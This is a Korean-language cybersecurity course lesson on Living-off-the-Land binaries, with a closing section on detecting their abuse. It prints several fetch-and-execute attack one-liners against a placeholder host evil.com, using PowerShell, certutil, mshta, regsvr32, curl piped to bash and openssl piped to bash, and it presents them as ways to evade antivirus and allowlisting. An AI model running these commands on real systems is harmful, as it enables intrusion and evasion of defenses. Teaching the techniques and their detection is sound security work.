Living-Off-the-Land 바이너리(LOLBins)
신뢰할 수 있는 Windows 바이너리(certutil, mshta, regsvr32)를 사용해 탐지를 회피합니다.
Living-Off-the-Land 바이너리(LOLBins)은(는) CoddyKit의 무료 Cyber Security Academy 강의입니다. 이것은 4개 중 2번째 강의입니다. 아래에서 전체 강의를 무료로 읽을 수 있으며, 내장 코드 에디터와 24/7 AI 튜터와 함께 브라우저에서 직접 실습할 수 있습니다. 이 강의는 Cyber Security Academy 학습 경로의 일부이며, 진행 상황이 웹과 CoddyKit 앱에 동기화됩니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.
LOLBins란 무엇인가요
시스템 기본 제공 바이너리(LOLBins)는 공격자가 악성 행위를 수행하도록 용도를 바꿔 사용하는 합법적인 OS 바이너리와 도구입니다. 이러한 도구는 신뢰할 수 있고 서명된 시스템 도구이므로 애플리케이션 허용 목록을 우회하고 AV/EDR 탐지를 줄이는 경우가 많습니다.
LOLBins가 효과적인 이유
공격자에게 유리한 점:
- 대상 시스템에 항상 존재하므로 새 파일을 내려놓을 필요가 없음
- Microsoft/Apple에서 서명하므로 시그니처 기반 탐지를 우회함
- 애플리케이션 허용 목록 솔루션에서 신뢰함
- 정상적으로 보이는 프로세스 트리를 생성함
LOBin으로서의 PowerShell
PowerShell은 가장 많이 악용되는 LOLBin입니다. 공격자는 다음을 사용합니다:
# Download and execute from memory:
powershell -enc BASE64_ENCODED_COMMAND
powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"certutil
certutil.exe는 파일을 다운로드할 수 있는 Windows 인증서 도구입니다:
# Download file to disk:
certutil -urlcache -split -f http://evil.com/payload.exe C:\temp\payload.exe
# Base64 decode:
certutil -decode encoded.b64 decoded.exemshta 및 wscript
신뢰된 호스트를 통한 스크립트 실행:
# mshta: execute HTA application from URL
mshta http://evil.com/payload.hta
# wscript: execute VBScript/JScript
wscript //E:VBScript evil.vbs
# cscript: console script host
cscript //nologo payload.jsregsvr32 Squiblydoo
regsvr32.exe는 /s /n /u /i 플래그를 통해 원격 URL에서 DLL을 로드하고 실행할 수 있으므로, AppLocker를 우회하고 서명되지 않은 코드를 신뢰된 프로세스로 실행합니다:
regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dllWMIC 및 WMI 실행
Windows Management Instrumentation은 원격 및 로컬에서 코드를 실행합니다:
# Execute command via WMI:
wmic process call create "powershell.exe -enc PAYLOAD"
# Remote execution:
wmic /node:TARGET process call create "cmd.exe /c payload.exe"Rundll32
rundll32.exe는 DLL 진입점을 로드하고 실행합니다:
# Execute a DLL export:
rundll32 evil.dll,EntryPoint
# Run JavaScript via rundll32:
rundll32 javascript:"\..\mshtml,RunHTMLApplication " payloadLinux LOLBins
Linux의 대응 도구:
# curl/wget for downloads:
curl http://evil.com/payload | bash
# Python for execution:
python3 -c "import os; os.system('whoami')"
# OpenSSL for file transfer:
openssl s_client -quiet -connect evil.com:443 | bash
# Find LOLBins: gtfobins.github.ioLOLBAS 및 GTFOBins
참고 데이터베이스:
- LOLBAS(lolbas-project.github.io) — Windows 바이너리, 스크립트, 라이브러리
- GTFOBins(gtfobins.github.io) — 악용, 파일 읽기/쓰기, SUID 권한 상승을 위한 Linux/macOS 바이너리
LOLBins 악용 탐지
탐지 전략:
- PowerShell 스크립트 블록 로깅(EventID 4104) — 디코딩된 명령을 기록
- Sysmon EventID 1: 부모 프로세스 체인을 포함한 프로세스 생성
- 예상치 못한 부모-자식 관계에 경고: Word → PowerShell, Excel → cmd
- certutil, mshta, powershell에서 발생한 네트워크 연결
- 비정상적인 바이너리 사용을 표시하기 위한 UEBA 기준선
빠른 확인: LOLBins
어떤 Windows 바이너리가 -urlcache 플래그를 사용하여 원격 파일을 다운로드할 수 있나요?
학습 내용 요약
LOLBins는 악성 용도로 전환된 합법적인 OS 도구입니다. Windows에서는 PowerShell, certutil, mshta, regsvr32, rundll32, WMIC가 사용되고, Linux에서는 curl, python, openssl이 사용됩니다. 이러한 도구는 시그니처 탐지와 애플리케이션 허용 목록을 우회합니다. 탐지하려면 프로세스 생성 로깅(Sysmon), PowerShell 스크립트 블록 로깅, 행동 기준선이 필요합니다. LOLBAS와 GTFOBins는 필수 참고 데이터베이스입니다.
자주 묻는 질문
“Living-Off-the-Land 바이너리(LOLBins)” 강의는 무료인가요?
네 — “Living-Off-the-Land 바이너리(LOLBins)” 전체 내용을 이 웹사이트에서 무료로 읽을 수 있습니다. 인터랙티브하게 실습하려면(내장 코드 에디터와 24/7 AI 튜터), CoddyKit PRO로 업그레이드하면 Cyber Security Academy 강의 전체를 잠금 해제할 수 있습니다. Cyber Security Academy 강의에는 총 4개의 강의가 포함되어 있습니다.
“Living-Off-the-Land 바이너리(LOLBins)”에서 뭘 배우나요?
신뢰할 수 있는 Windows 바이너리(certutil, mshta, regsvr32)를 사용해 탐지를 회피합니다. 브라우저에서 직접 실행하는 실습 코드로 Cyber Security Academy을(를) 배우며, 24/7 AI 튜터가 강의를 진행하면서 질문에 답변해줍니다.
Cyber Security Academy을(를) 시작하는 데 경험이 필요한가요?
사전 경험은 필요하지 않습니다. CoddyKit의 Cyber Security Academy은(는) 초급자부터 고급 학습자까지를 위해 구성되어 있으므로, 여기서 시작하거나 처음부터 시작할 수 있으며 자신의 속도대로 진행할 수 있습니다. 이것은 4개 중 2번째 강의입니다.
“Living-Off-the-Land 바이너리(LOLBins)” 강의는 얼마나 걸리나요?
대부분의 CoddyKit 강의는 약 5~10분이 소요됩니다. 각 강의는 간결하고 인터랙티브하여 꾸준한 진행이 가능하며, 웹과 앱에서 중단한 부분부터 바로 시작할 수 있습니다.
이 Cyber Security Academy 강의에서 코드를 작성하고 실행할 수 있나요?
네. 모든 Cyber Security Academy 강의에는 내장 코드 에디터가 포함되어 있으므로, 브라우저에서 바로 실제 코드를 작성하고 실행한 후 즉시 AI 피드백을 받을 수 있습니다 — 로컬 설정이 필요 없습니다.
이 강의의 모든 강의
- C2 프레임워크: Cobalt Strike와 Sliver
- Living-Off-the-Land 바이너리(LOLBins)
- 측면 이동 기법
- 레드 팀 보고서 작성